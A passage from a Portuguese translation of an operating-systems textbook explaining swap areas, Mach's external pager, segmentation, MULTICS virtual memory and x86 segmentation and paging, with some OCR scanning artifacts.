cular esse endereço exige saber apenas onde a área de 
paginação do processo começa, tendo em vista que as 
páginas são armazenadas nele contiguamente na ordem 
do seu número de página virtual. Uma página que está 
na memória sempre tem uma cópia sombreada no disco, 
mas essa cópia pode estar desatualizada se a página foi 
modificada desde que foi carregada. As páginas som- 
breadas na memória indicam páginas não presentes na 
memória. As páginas sombreadas no disco são (em prin- 
cípio) substituídas pelas cópias na memória, embora se 
uma página na memória precisar ser enviada novamente 
ao disco e não tiver sido modificada desde que ela foi 
carregada, a cópia do disco (sombreada) será usada. 

Na Figura 3.28(b), as páginas não têm endereços 
fixos no disco. Quando uma página é levada para o 
disco, uma página de disco vazia é escolhida imedia- 
tamente e o mapa do disco (que tem espaço para um 
endereço de disco por página virtual) é atualizado de 
acordo. Uma página na memória não tem cópia em 
disco. As entradas da página no mapa do disco contêm 
um endereço de disco inválido ou um bit que indica 
que não estão em uso. 

Nem sempre é possível ter uma partição de troca 
fixa. Por exemplo, talvez nenhuma partição de disco 
esteja disponível. Nesse caso, um ou mais arquivos 
pré-alocados grandes dentro do sistema de arquivos 
normal pode ser usado. O Windows usa essa aborda- 
gem. No entanto, uma otimização pode ser usada aqui 
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para reduzir a quantidade de espaço de disco necessá- 
ria. Como o texto do programa de cada processo veio 
de algum arquivo (executável) no sistema de arquivos, 
o arquivo executável pode ser usado como a área de 
troca. Melhor ainda, tendo em vista que o texto do 
programa é em geral somente para leitura, quando a 
memória está cheia e as páginas do programa precisam 
ser removidas dela, elas são simplesmente descartadas 
e lidas de novo de um arquivo executável quando ne- 
cessário. Bibliotecas compartilhadas também funcio- 
nam dessa maneira. 


3.6.6 Separação da política e do mecanismo 


Uma ferramenta importante para o gerenciamento da 
complexidade de qualquer sistema é separar a política 
do mecanismo. Esse princípio pode ser aplicado ao ge- 
renciamento da memória fazendo que a maioria dos ge- 
renciadores de memória seja executada como processos 
no nivel do usuário. Tal separação foi feita pela primeira 
vez em Mach (YOUNG et al., 1987) sobre a qual a dis- 
cussão é baseada a seguir. 

Um exemplo simples de como a política e o meca- 
nismo podem ser separados é mostrado na Figura 3.29. 
Aqui o sistema de gerenciamento de memória está divi- 
dido em três partes: 


1. Um tratador de MMU de baixo nível. 

2. Um tratador de falta de página que faz parte do 
núcleo. 

3. Um paginador externo executado no espaço do 
usuário. 


Todos os detalhes de como a MMU funciona são 
encapsulados no tratador de MMU, que é um código 
dependente de máquina e precisa ser reescrito para cada 
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nova plataforma que o sistema operacional executar. O 
tratador de falta de página é um código independente de 
máquina e contém a maior parte do mecanismo para pa- 
ginação. A política é determinada em grande parte pelo 
paginador externo, que é executado como um processo 
do usuário. 

Quando um processo é iniciado, o paginador exter- 
no é notificado a fim de ajustar o mapa de páginas do 
processo e alocar o armazenamento de apoio no disco 
se necessário. À medida que o processo é executado, 
ele pode mapear novos objetos em seu espaço de ende- 
reçamento, então o paginador externo é mais uma vez 
notificado. 

Assim que o processo começar a execução, ele pode 
causar uma falta de página. O tratador de faltas calcula 
qual página virtual é necessária e envia uma mensagem 
para o paginador externo, dizendo a ele o problema. O 
paginador externo então lê a página necessária do dis- 
co e a copia para uma porção do seu próprio espaço de 
endereçamento. Então ele conta para o tratador de fal- 
tas onde está a página. O tratador de páginas remove 
o mapeamento da página do espaço de endereçamento 
do paginador externo e pede ao tratador da MMU para 
colocar a página no local correto dentro do espaço de 
endereçamento do usuário. Então o processo do usuário 
pode ser reiniciado. 

Essa implementação deixa livre o local onde o al- 
goritmo de substituição da página é colocado. Seria 
mais limpo tê-lo no paginador externo, mas há alguns 
problemas com essa abordagem. O principal entre eles 
é que o paginador externo não tem acesso aos bits R 
e M de todas as páginas. Esses bits têm um papel em 
muitos dos algoritmos de paginação. Desse modo, ou 
algum mecanismo é necessário para passar essa infor- 
mação para o paginador externo, ou o algoritmo de 
substituição de página deve ir ao núcleo. No segundo 
caso, o tratador de faltas diz ao paginador externo qual 
página ele selecionou para remoção e fornece os da- 
dos, seja mapeando-os no espaço do endereçamento 
do paginador externo ou incluindo-os em uma mensa- 
gem. De qualquer maneira, o paginador externo escre- 
ve os dados para o disco. 

A principal vantagem dessa implementação é um 
código mais modular e maior flexibilidade. A princi- 
pal desvantagem é o custo extra causado pelos diversos 
chaveamentos entre o núcleo e o usuário, assim como a 
sobrecarga nas trocas de mensagens entre as partes do 
sistema. No momento, o assunto é altamente controver- 
so, mas, como os computadores ficam mais rápidos a 
cada dia, e os softwares mais complexos, sacrificar em 
longo prazo algum desempenho por um software mais 


confiável provavelmente será algo aceitável pela maio- 
ria dos implementadores. 


3.7 Segmentação 


A memória virtual discutida até aqui é unidimensio- 
nal, pois os endereços virtuais vão de 0 a algum endere- 
ço máximo, um endereço depois do outro. Para muitos 
problemas, ter dois ou mais espaços de endereços vir- 
tuais pode ser muito melhor do que ter apenas um. Por 
exemplo, um compilador tem muitas tabelas construi- 
das em tempo de compilação, possivelmente incluindo: 


1. O código-fonte sendo salvo para impressão (em 

sistemas de lote). 

2. A tabela de símbolos, contendo os nomes e atri- 

butos das variáveis. 

3. A tabela contendo todas as constantes usadas, in- 

teiras e em ponto flutuante. 

4. A árvore sintática, contendo a análise sintática do 

programa. 

5. A pilha usada pelas chamadas de rotina dentro do 

compilador. 

Cada uma das quatro primeiras tabelas cresce con- 
tinuamente à medida que a compilação prossegue. A 
última cresce e diminui de maneiras imprevisíveis du- 
rante a compilação. Em uma memória unidimensional, 
essas cinco tabelas teriam de ser alocadas em regiões 
contíguas do espaço de endereçamento virtual, como na 
Figura 3.30. 
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Considere o que acontece se um programa tiver um 
número muito maior do que o usual de variáveis, mas 
uma quantidade normal de todo o resto. A região do es- 
paço de endereçamento alocada para a tabela de símbo- 
los pode se esgotar, mas talvez haja muito espaço nas 
outras tabelas. É necessário encontrar uma maneira de 
liberar o programador de ter de gerenciar as tabelas em 
expansão e contração, da mesma maneira que a memó- 
ria virtual elimina a preocupação de organizar o progra- 
ma em sobreposições (overlays). 

Uma solução direta e bastante geral é fornecer à 
máquina espaços de endereçamento completamente in- 
dependentes, que são chamados de segmentos. Cada 
segmento consiste em uma sequência linear de endere- 
ços, começando em 0 e indo até algum valor máximo. O 
comprimento de cada segmento pode ser qualquer coi- 
sa de O ao endereço máximo permitido. Diferentes seg- 
mentos podem e costumam ter comprimentos diferentes. 
Além disso, comprimentos de segmentos podem mudar 
durante a execução. O comprimento de um segmento de 
pilha pode ser aumentado sempre que algo é colocado so- 
bre a pilha e diminuído toda vez que algo é retirado dela. 

Como cada segmento constitui um espaço de ende- 
reçamento separado, diferentes segmentos podem cres- 
cer ou encolher independentemente sem afetar um ao 
outro. Se uma pilha em um determinado segmento pre- 
cisa de mais espaço de endereçamento para crescer, ela 
pode tê-lo, pois não há nada mais atrapalhando em seu 
espaço de endereçamento. Claro, um segmento pode fi- 
car cheio, mas segmentos em geral são muito grandes, 
então essa ocorrência é rara. Para especificar um ende- 
reço nessa memória segmentada ou bidimensional, o 
programa precisa fornecer um endereço em duas partes, 
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um número de segmento e um endereço dentro do seg- 
mento. A Figura 3.31 ilustra uma memória segmentada 
sendo usada para as tabelas do compilador discutidas 
anteriormente. Cinco segmentos independentes são 
mostrados aqui. 

Enfatizamos aqui que um segmento é uma entida- 
de lógica, que o programador conhece e usa como uma 
entidade lógica. Um segmento pode conter uma rotina, 
um arranjo, uma pilha, ou um conjunto de variáveis es- 
calares, mas em geral ele não contém uma mistura de 
tipos diferentes. 

Uma memória segmentada tem outras vantagens 
além de simplificar o tratamento das estruturas de dados 
que estão crescendo ou encolhendo. Se cada rotina ocu- 
pa um segmento em separado, com o endereço 0 como 
o de partida, a ligação das rotinas compiladas separada- 
mente é bastante simplificada. Afinal de contas, todos 
os procedimentos que constituem um programa foram 
compilados e ligados, uma chamada para a rotina no 
segmento n usará o endereço de duas partes (n, 0) para 
endereçar a palavra 0 (o ponto de entrada). 

Se o procedimento no segmento n for subsequente- 
mente modificado e recompilado, nenhum outro proce- 
dimento precisará ser trocado (pois nenhum endereço de 
partida foi modificado), mesmo que a nova versão seja 
maior do que a antiga. Com uma memória unidimen- 
sional, as rotinas são fortemente empacotadas próximas 
umas das outras, sem um espaço de endereçamento en- 
tre elas. Em consequência, mudar o tamanho de uma 
rotina pode afetar o endereço inicial de todas as outras 
(não relacionadas) no segmento. Isso, por sua vez, exige 
modificar todas as rotinas que fazem chamadas às roti- 
nas que foram movidas, a fim de incorporar seus novos 


(FIGURA 3.31 | Uma memória segmentada permite que cada tabela cresça ou encolha independentemente das outras tabelas. 
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endereços iniciais. Se um programa contém centenas de 
rotinas, esse processo pode sair caro. 

A segmentação também facilita compartilhar rotinas 
ou dados entre vários processos. Um exemplo comum 
é o da biblioteca compartilhada. Estações de trabalho 
modernas que executam sistemas avançados de janelas 
têm bibliotecas gráficas extremamente grandes com- 
piladas em quase todos os programas. Em um sistema 
segmentado, a biblioteca gráfica pode ser colocada em 
um segmento e compartilhada por múltiplos processos, 
eliminando a necessidade de tê-la em cada espaço de 
endereçamento do processo. Embora seja possível ter 
bibliotecas compartilhadas em sistemas de paginação 
puros, essa situação é mais complicada. Na realidade, 
esses sistemas o fazem simulando a segmentação. 

Visto que cada segmento forma uma entidade lógica 
que os programadores conhecem, como uma rotina, ou 
um arranjo, diversos segmentos podem ter diferentes ti- 
pos de proteção. Um segmento de rotina pode ser especi- 
ficado como somente de execução, proibindo tentativas 
de ler a partir dele ou armazenar algo nele. Um conjunto 
de ponto flutuante pode ser especificado como somente 
de leitura/escrita, mas não execução, e tentativas de sal- 
tar para ele serão pegas. Esse tipo de proteção é interes- 
sante para pegar erros. A paginação e a segmentação são 
comparadas na Figura 3.32. 


3.7.1 Implementação da segmentação pura 


A implementação da segmentação difere da pagina- 
ção de uma maneira essencial: as páginas são de um 


eN TEE Comparação entre paginação e segmentação. 


tamanho fixo e os segmentos, não. A Figura 3.33(a) 
mostra um exemplo de memória física de início conten- 
do cinco segmentos. Agora considere o que acontece se 
o segmento 1 for removido e o segmento 7, que é me- 
nor, for colocado em seu lugar. Chegamos à configura- 
ção de memória da Figura 3.33(b). Entre o segmento 7 
e o segmento 2 há uma área não utilizada — isto é, uma 
lacuna. Então o segmento 4 é substituído pelo segmento 
5, como na Figura 3.33(c), e o segmento 3 é substitu- 
ido pelo segmento 6, como na Figura 3.33(d). Após o 
sistema ter sido executado por um tempo, a memória 
será dividida em uma série de pedaços, alguns contendo 
segmentos e outros lacunas. Esse fenômeno, chamado 
de fragmentação externa (ou checker boarding), des- 
perdiça memória nas lacunas. Isso pode ser sanado com 
a compactação, como mostrado na Figura 3.33(e). 


3.7.2 Segmentação com paginação: MULTICS 


Se os segmentos forem grandes, talvez seja incon- 
veniente, ou mesmo impossível, mantê-los na memória 
principal em sua totalidade. Isso leva à ideia de reali- 
zar a paginação dos segmentos, de maneira que apenas 
aquelas páginas de um segmento que são realmente ne- 
cessárias tenham de estar na memória. 

Vários sistemas significativos têm dado suporte a 
segmentos paginados. Nesta seção, descreveremos o 
primeiro deles: MULTICS. Na próxima discutiremos 
um mais recente: o Intel x86 até o x86-64. 

O sistema operacional MULTICS foi um dos mais in- 
fluentes de todos os tempos, exercendo uma importante 
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influência em tópicos tão díspares quanto o UNIX, a ar- 
quitetura de memória do x86, os TLBs e a computação 
na nuvem. Ele começou como um projeto de pesquisa 
na M.I.T. e foi colocado na prática em 1969. O último 
sistema MULTICS foi encerrado em 2000, uma vida 
útil de 31 anos. Poucos sistemas operacionais duraram 
tanto sem modificações maiores. Embora os sistemas 
operacionais Windows também estejam aí há bastante 
tempo, o Windows 8 não tem absolutamente nada a ver 
com o Windows 1.0, exceto o nome e o fato de ter sido 
escrito pela Microsoft. Mais ainda, as ideias desenvol- 
vidas no MULTICS são tão válidas e úteis hoje quanto 
o eram em 1965, quando o primeiro estudo foi publica- 
do (CORBATO e VYSSOTSKY, 1965). Por essa razão, 
dedicaremos algum tempo agora examinando o aspecto 
mais inovador do MULTICS, a arquitetura de memória 
virtual. Mais informações a respeito podem ser encon- 
tradas em <www.multicians.org>. 

O MULTICS era executado em máquinas Honeywell 
6000 e seus descendentes e provia cada programa com 
uma memória virtual de até 2!º segmentos, cada um de- 
les com até 65.536 palavras (36 bits) de comprimen- 
to. Para implementá-lo, os projetistas do MULTICS 
escolheram tratar cada segmento como uma memória 
virtual e assim paginá-lo, combinando as vantagens da 
paginação (tamanho da página uniforme e não precisar 
manter o segmento todo na memória caso apenas uma 
parte dele estivesse sendo usada) com as vantagens da 
segmentação (facilidade de programação, modularida- 
de, proteção, compartilhamento). 

Cada programa MULTICS tinha uma tabela de seg- 
mentos, com um descritor por segmento. Dado que 
havia potencialmente mais de um quarto de milhão 
de entradas na tabela, a tabela de segmentos era em 
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si um segmento e também paginada. Um descritor de 
segmento continha um indicativo sobre se o segmento 
estava na memória principal ou não. Se qualquer parte 
do segmento estivesse na memória, ele era considerado 
estando na memória, e sua tabela de página estaria. Se 
o segmento estava na memória, seu descritor continha 
um ponteiro de 18 bits para sua tabela de páginas, como 
na Figura 3.34(a). Como os endereços físicos tinham 24 
bits e as páginas eram alinhadas em limites de 64 bytes 
(implicando que os 6 bits de mais baixa ordem dos en- 
dereços das páginas sejam 000000), apenas 18 bits eram 
necessários no descritor para armazenar um endereço 
de tabela de página. O descritor também continha o ta- 
manho do segmento, os bits de proteção e outros itens. 
A Figura 3.34(b) ilustra um descritor de segmento. O 
endereço do segmento na memória secundária não esta- 
va no descritor, mas em outra tabela usada pelo tratador 
de faltas de segmento. 

Cada segmento era um espaço de endereçamento 
virtual comum e estava paginado da mesma maneira 
que a memória paginada não segmentada já descrita 
neste capítulo. O tamanho de página normal era 1024 
palavras (embora alguns segmentos pequenos usados 
pelo MULTICS em si não eram paginados ou eram pa- 
ginados em unidades de 64 palavras para poupar me- 
mória física). 

Um endereço no MULTICS consistia em duas par- 
tes: o segmento e o endereço dentro dele. O endereço 
dentro do segmento era dividido ainda em um número 
de página e uma palavra dentro da página, como mos- 
trado na Figura 3.35. Quando ocorria uma referência de 
memória, o algoritmo a seguir era executado: 


1. O número do segmento era usado para encontrar 
o descritor do segmento. 


(FIGURA 3.33 | (a)-(d) Desenvolvimento da fragmentação externa. (e) Remoção da fragmentação externa. 
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leia EEZ A memória virtual MULTICS. (a) O descritor de segmento apontado para as tabelas de páginas. (b) Um descritor de 
segmento. Os números são os comprimentos dos campos. 


~ 36 bits >— 
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lei) RI] Um endereço virtual MULTICS de 34 bits. 
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2. Uma verificação era feita para ver se a tabela de 
paginas do segmento estava na memoria. Se es- 
tivesse, ela era localizada. Se não estivesse, uma 
falta de segmento ocorria. Se houvesse uma viola- 
ção de proteção, ocorria uma falta (interrupção). 
A entrada da tabela de páginas para a página 
virtual pedida era examinada. Se a página em si 
não estivesse na memória, uma falta de página 
era desencadeada. Se ela estivesse na memória, o 


6 10 


endereço da memória principal do início da pági- 
na era extraído da entrada da tabela de páginas. 
O deslocamento era adicionado à origem da pági- 
na a fim de gerar o endereço da memória princi- 
pal onde a palavra estava localizada. 

A leitura ou a escrita podiam finalmente ser 
feitas. 


Esse processo está ilustrado na Figura 3.36. Para 
simplificar, o fato de que o segmento de descritores em 


si foi paginado foi omitido. O que realmente aconteceu 
foi que um registrador (o registrador base do descritor) 
foi usado para localizar a tabela de páginas do segmento 
de descritores, a qual, por sua vez, apontava para as pá- 
ginas do segmento de descritores. Uma vez encontrado 
o descritor para o segmento necessário, o endereçamen- 
to prosseguia como mostrado na Figura 3.36. 

Como você deve ter percebido, se o algoritmo an- 
terior fosse de fato utilizado pelo sistema operacional 
em todas as instruções, os programas não executariam 
rápido. Na realidade, o hardware MULTICS continha 
um TLB de alta velocidade de 16 palavras que podia 
pesquisar todas as suas entradas em paralelo para uma 
dada chave. Esse foi o primeiro sistema a ter um TLB, 
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algo usado em todas as arquiteturas modernas. Isso está 
ilustrado na Figura 3.37. Quando um endereço era apre- 
sentado ao computador, o hardware de endereçamento 
primeiro conferia para ver se o endereço virtual estava 
no TLB. Em caso afirmativo, ele recebia o número do 
quadro de página diretamente do TLB e formava o en- 
dereço real da palavra referenciada sem ter de olhar no 
segmento descritor ou tabela de páginas. 

Os endereços das 16 páginas mais recentemente 
referenciadas eram mantidos no TLB. Programas cujo 
conjunto de trabalho era menor do que o tamanho do 
TLB encontravam equilíbrio com os endereços de todo 
o conjunto de trabalho no TLB e, portanto, executavam 
eficientemente; de outra forma, ocorriam faltas no TLB. 


(FIGURA 3.36 | Conversão de um endereço de duas partes do MULTICS em um endereço de memória principal. 
Endereço virtual MULTICS 
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le] ETA Uma versão simplificada do TLB da MULTICS. A existência de dois tamanhos de páginas torna o TLB real mais 
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172 | SISTEMAS OPERACIONAIS MODERNOS 


3.7.3 Segmentação com paginação: o Intel x86 


Até o x86-64, o sistema de memória virtual do x86 
lembrava o sistema do MULTICS de muitas maneiras, 
incluindo a presença tanto da segmentação quanto da 
paginação. Enquanto o MULTICS tinha 265K segmen- 
tos independentes, cada um com até 64k e palavras de 
36 bits, o x86 tem 16K segmentos independentes, cada 
um com até 1 bilhão de palavras de 32 bits. Embora 
existam menos segmentos, o tamanho maior deles é 
muito mais importante, à medida que poucos progra- 
mas precisam de mais de 1000 segmentos, mas muitos 
programas precisam de grandes segmentos. Quanto ao 
x86-64, a segmentação é considerada obsoleta e não 
tem mais suporte, exceto no modo legado. Embora al- 
guns vestígios dos velhos mecanismos de segmentação 
ainda estejam disponíveis no modo nativo do x86-64, 
na maior parte das vezes, por compatibilidade, eles não 
têm mais o mesmo papel e não oferecem mais uma ver- 
dadeira segmentação. O x86-32, no entanto, ainda vem 
equipado com todo o aparato e é a CPU que discutire- 
mos nessa seção. 

O coração da memória virtual do x86 consiste em 
duas tabelas, chamadas de LDT (Local Descriptor 
Table — tabela de descritores locais) e GDT (Global 
Descriptor Table — tabela de descritores globais). 
Cada programa tem seu próprio LDT, mas há uma única 
GDT, compartilhada por todos os programas no com- 
putador. A LDT descreve segmentos locais a cada pro- 
grama, incluindo o seu código, dados, pilha e assim por 
diante, enquanto a GDT descreve segmentos de sistema, 
incluindo o próprio sistema operacional. 

Para acessar um segmento, um programa x86 primei- 
ro carrega um seletor para aquele segmento em um dos 
seis registradores de segmentos da máquina. Durante a 
execução, o registrador CS guarda o seletor para o seg- 
mento de código e o registrador DS guarda o seletor para 
o segmento de dados. Os outros registradores de segmen- 
tos são menos importantes. Cada seletor é um número de 
16 bits, como mostrado na Figura 3.38. 

Um dos bits do seletor diz se o segmento é local ou 
global (isto é, se ele está na LDT ou na GDT). Treze 
outros bits especificam o número de entrada da LTD ou 


[et] Um seletor x86. 


Bits 13 1 2 


oi || 





0 = GDT/1 = LDT Nível de privilégio (0-3) 


da GDT, portanto cada tabela está restrita a conter 8K 
descritores de segmentos. Os outros 2 bits relacionam- 
-se à proteção, e serão descritos mais tarde. O descritor 
0 é proibido. Ele pode ser seguramente carregado em 
um registrador de segmento para indicar que o registra- 
dor não está atualmente disponivel. Ele provocará uma 
interrupção de armadilha se usado. 

No momento em que um seletor é carregado em 
um registrador de segmento, o descritor correspon- 
dente é buscado na LDT ou na GDT e armazenado 
em registradores de microprogramas, de maneira que 
eles possam ser acessados rapidamente. Como descri- 
to na Figura 3.39, um descritor consiste em 8 bytes, 
incluindo o endereço base do segmento, tamanho e 
outras informações. 

O formato do seletor foi escolhido de modo inteli- 
gente para facilitar a localização do descritor. Primeiro 
a LDT ou a GDT é escolhida, com base no bit seletor 
2. Então o seletor é copiado para um registrador pro- 
visório interno, e os 3 bits de mais baixa ordem são 
marcados com 0. Por fim, o endereço da LDT ou da 
GDT é adicionado a ele, com o intuito de dar um pon- 
teiro direto para o descritor. Por exemplo, o seletor 72 
refere-se à entrada 9 na GDT, que está localizada no 
endereço GDT + 72. 

Vamos traçar agora os passos pelos quais um par 
(seletor, deslocamento) é convertido em um endereço 
fisico. Tão logo o microprograma saiba qual registra- 
dor de segmento está sendo usado, ele poderá encontrar 
o descritor completo correspondente àquele seletor em 
seus registradores internos. Se o segmento não existir 
(seletor 0), ou se no momento estiver em disco, ocorrerá 
uma interrupção de armadilha. 

O hardware então usará o campo Limite para conferir 
se o deslocamento está além do fim do segmento, caso 
em que uma interrupção de armadilha também ocorre. 
Logicamente, deve haver um campo de 32 bits no des- 
critor dando o tamanho do segmento, mas apenas 20 bits 
estão disponíveis, então um esquema diferente é usado. 
Se o campo Gbit (Granularidade) for 0, o campo Limite é 
do tamanho de segmento exato, até 1 MB. Se ele for 1 o 
campo Limite då o tamanho do segmento em páginas em 
vez de bytes. Com um tamanho de página de 4 KB, 20 
bits é o suficiente para segmentos de até 2°% bytes. 

Presumindo que o segmento está na memória e o 
deslocamento está dentro do alcance, o x86 então acres- 
centa o campo Base de 32 bits no descritor ao deslo- 
camento para formar o que é chamado de endereço 
linear, como mostrado na Figura 3.40. O campo Base é 
dividido em três partes e espalhado por todo o descritor 
para compatibilidade com o 286, no qual o campo Base 
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(eU EÆELI Descritor de segmento de código do x86. Os segmentos de dados diferem ligeiramente. 
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KEALE Conversão de um par (de seletores, 
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Seletor Deslocamento 







Descritor 


Endereço da base 







Limite 


Outros campos 


Endereço linear de 32 bits 


tem somente 24 bits. Na realidade, o campo Base per- 
mite que cada segmento comece em um local arbitrario 
dentro do espaço de endereçamento linear de 32 bits. 

Se a paginacao for desabilitada (por um bit em um 
registrador de controle global), o endereço linear sera 
interpretado como o endereço físico e enviado para a 
memória para ser lido ou escrito. Desse modo, com a pa- 
ginação desabilitada, temos um esquema de segmentação 
puro, com cada endereço base do segmento dado em seu 
descritor. Segmentos não são impedidos de sobrepor-se, 
provavelmente porque daria trabalho demais verificar se 
eles estão disjuntos. 

Por outro lado, se a paginação estiver habilitada, o 
endereço linear é interpretado como um endereço vir- 
tual e mapeado no endereço físico usando as tabelas 
de páginas, de maneira bastante semelhante aos nossos 
exemplos anteriores. A única complicação real é que 
com um endereço virtual de 32 bits e uma página de 4 
KB, um segmento poderá conter 1 milhão de páginas, 
então um mapeamento em dois níveis é usado para re- 
duzir o tamanho da tabela de páginas para segmentos 
pequenos. 

Cada programa em execução tem um diretório de pá- 
ginas consistindo de 1024 entradas de 32 bits. Ele esta 


„ Endereço 
relativo 


localizado em um endereço apontado por um registrador 
global. Cada entrada nesse diretório aponta para uma tabe- 
la de páginas também contendo 1024 entradas de 32 bits. 
As entradas da tabela de páginas apontam para os quadros 
de páginas. O esquema é mostrado na Figura 3.41. 

Na Figura 3.41(a) vemos um endereço linear divi- 
dido em três campos, Dir, Página e Deslocamento. O 
campo Dir é usado para indexar dentro do diretório de 
páginas a fim de localizar um ponteiro para a tabela de 
páginas adequada. Então o campo Página é usado como 
um índice dentro da tabela de páginas para encontrar o 
endereço físico do quadro de página. Por fim, Deslo- 
camento é adicionado ao endereço do quadro de pági- 
na para conseguir o endereço físico do byte ou palavra 
necessária. 

As entradas da tabela de páginas têm 32 bits cada 
uma, 20 dos quais contêm um número de quadro de pá- 
gina. Os bits restantes contêm informações de acesso 
e modificações, marcados pelo hardware para ajudar o 
sistema operacional, bits de proteção e outros bits úteis. 

Cada tabela de páginas tem entradas para 1024 qua- 
dros de página de 4 KB, de maneira que uma única ta- 
bela de páginas gerencia 4 megabytes de memória. Um 
segmento mais curto do que 4M terá um diretório de 
páginas com uma única entrada e um ponteiro para sua 
única tabela. Dessa maneira, o custo extra para segmen- 
tos curtos é de apenas duas páginas, em vez do milhão 
de páginas que seriam necessárias em uma tabela de pá- 
ginas de um único nível. 

Para evitar fazer repetidas referências à memória, o 
x86, assim como o MULTICS, tem uma TLB peque- 
na que mapeia diretamente as combinações Dir-Página 
mais recentemente usadas no endereço físico do quadro 
de página. Apenas quando a combinação atual não esti- 
ver presente na TLB, o mecanismo da Figura 3.41 será 
realmente executado e a TLB atualizada. Enquanto as 
faltas na TLB forem raras, o desempenho será bom. 
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eN TEZE Mapeamento de um endereço linear em um endereço físico. 
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Vale a pena observar que se alguma aplicação não 
precisa de segmentação, mas está simplesmente con- 
tente com um único espaço de endereçamento paginado 
de 32 bits, o modelo citado é possível. Todos os regis- 
tradores de segmentos podem ser estabelecidos com o 
mesmo seletor, cujo descritor tem Base = 0 e Limite 
estabelecido para o máximo. O deslocamento da instru- 
ção será então o endereço linear, com apenas um único 
espaço de endereçamento usado — na realidade, pagi- 
nação normal. De fato, todos os sistemas operacionais 
atuais para o x86 funcionam dessa maneira. OS/2 era o 
único que usava o poder total da arquitetura MMU da 
Intel. 

Então por que a Intel matou o que era uma varian- 
te do ótimo modelo de memória do MULTICS a que 
ela deu suporte por quase três décadas? Provavelmen- 
te a principal razão é que nem o UNIX, tampouco o 
Windows, jamais chegaram a usá-lo, mesmo ele sendo 
bastante eficiente, pois eliminava as chamadas de siste- 
ma, transformando-as em chamadas de rotina extrema- 
mente rápidas para o endereço relevante dentro de um 
segmento protegido do sistema operacional. Nenhum 
dos desenvolvedores de quaisquer sistemas UNIX ou 
Windows quiseram mudar seu modelo de memória para 
algo que fosse específico do x86, pois isso acabaria 
com a portabilidade com outras plataformas. Como o 
software não estava usando o modelo, a Intel cansou-se 
de desperdiçar área de chip para apoiá-lo e o removeu 
das CPUs de 64 bits. 


Tabela de paginas 


(a) 


Quadro de pagina 
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Deslocamento 


Palavra 
selecionada 
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Entrada da 
tabela de paginas 
aponta para palavra 


Como um todo, é preciso dar o crédito merecido aos 
projetistas do x86. Dadas as metas conflitantes de imple- 
mentar a paginação e a segmentação puras e os segmen- 
tos paginados, enquanto ao mesmo tempo é compatível 
com o 286 e faz tudo isso de maneira eficiente, o projeto 
resultante é surpreendentemente simples e limpo. 


3.8 Pesquisa em gerenciamento de 
memória 


O gerenciamento de memória tradicional, especial- 
mente os algoritmos de paginação para CPUs unipro- 
cessadores, um dia foi uma área de pesquisa fértil, mas a 
maior parte já é passado, pelo menos para sistemas de pro- 
pósito geral, embora existam algumas pessoas que jamais 
desistem (MORUZ et al., 2012) ou estão concentradas em 
alguma aplicação, como o processamento de transações 
on-line, que tem exigências especializadas (STOICA e 
AILAMAKI, 2013). Mesmo em uniprocessadores, a pa- 
ginação para SSDs em vez de discos rígidos levanta novas 
questões e exige novos algoritmos (CHEN et al., 2012). 
A paginação para as últimas memórias com mudança de 
fase não voláteis também exige repensar a paginação para 
desempenho (LEE et al., 2013) e questões de latência 
(SAITO e OIKAWA, 2012), e por que elas se desgastam 
se usadas demais (BHEDA et al., 2011, 2012). 

De maneira mais geral, a pesquisa sobre a paginação 
ainda está acontecendo, mas ela se concentra em tipos 


novos de sistemas. Por exemplo, máquinas virtuais 
renovaram o interesse no gerenciamento de memória 
(BUGNION et al., 2012). Na mesma área, o trabalho 
por Jantz et al. (2013) deixa que as aplicações prove- 
nham orientação para o sistema em relação a decidir 
sobre a página física que irá apoiar uma página virtual. 
Um aspecto da consolidação de servidores na nuvem 
que afeta a paginação é que o montante de memória fi- 
sica disponível para uma máquina virtual pode variar 
com o tempo, exigindo novos algoritmos (PESERICO, 
2013). 

A paginação em sistemas com múltiplos núcleos 
tornou-se uma nova área de pesquisa (BOYD-WICKI- 
ZER et al., 2008; BAUMANN et al., 2009). Um fator 
que contribui para isso é que os sistemas de múltiplos 


3.9 Resumo 


Neste capítulo examinamos o gerenciamento de 
memória. Vimos que os sistemas mais simples não rea- 
lizam nenhuma troca de processo na memória ou pagi- 
nação. Uma vez que um programa tenha sido carregado 
na memória, ele segue nela até sua finalização. Alguns 
sistemas operacionais permitem apenas um processo de 
cada vez na memória, enquanto outros dão suporte à 
multiprogramação. Esse modelo ainda é comum em sis- 
temas pequenos de tempo real embarcados. 

O próximo passo é a troca de processos. Quando ela 
é usada, o sistema pode lidar com mais processos do 
que ele tem espaço na memória. Processos para os quais 
não há espaço são enviados para o disco. Espaço dispo- 
nível na memória e no disco pode ser controlado com o 
uso de mapas de bits ou listas de lacunas. 

Computadores modernos muitas vezes têm alguma 
forma de memória virtual. Na maneira mais simples, 
cada espaço de endereçamento do processo é dividido 
em blocos de tamanho uniforme chamados de páginas, 
que podem ser colocadas em qualquer quadro de página 
disponível na memória. Existem muitos algoritmos de 


PROBLEMAS 


1. O IBM 360 tem um esquema de travar blocos de 2 KB 
designando a cada um uma chave de 4 bits e fazendo a 
CPU comparar a chave em cada referência de memória a 
uma chave de 4 bits no PSW. Cite dois problemas desse 
esquema não mencionados no texto. 

2. Na Figura 3.3 os registradores base e limite contêm o 
mesmo valor, 16.384. Isso é apenas um acidente, ou eles 
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núcleos tendem a possuir muita memória cache com- 
partilhada de maneiras complexas (LOPEZ-ORTIZ e 
SALINGER, 2012). Relacionada de muito perto com 
esse trabalho de múltiplos núcleos encontra-se a pesqui- 
sa sobre paginação em sistemas NUMA, onde diversas 
partes da memória podem ter diferentes tempos de aces- 
so (DASHTI et al., 2013; LANKES et al., 2012). 

Também smartphones e tablets tornam-se peque- 
nos PCs e muitos deles paginam RAM para o “disco”, 
embora o disco em um smartphone seja uma memória 
flash. Algum trabalho recente foi feito por Joo et al. 
(2012). 

Por fim, o interesse em gerenciamento de memória 
para sistemas em tempo real continua presente (KATO 
et al., 2011). 


substituição de página; dois dos melhores são o do en- 
velhecimento e WSClock. 

Para fazer que os sistemas de paginação funcionem 
bem, escolher um algoritmo não é o suficiente; é neces- 
sário dar atenção para questões como a determinação do 
conjunto de trabalho, a política de alocação de memória 
e o tamanho da página. 

A segmentação ajuda a lidar com estruturas de dados 
que podem mudar de tamanho durante a execução e sim- 
plifica a ligação e o compartilhamento. Ela também fa- 
cilita proporcionar proteção para diferentes segmentos. 
Às vezes a segmentação e a paginação são combinadas 
para proporcionar uma memória virtual bidimensional. 
O sistema MULTICS e o x86 de 32 bits da Intel dão 
suporte à segmentação e à paginação. Ainda assim, fica 
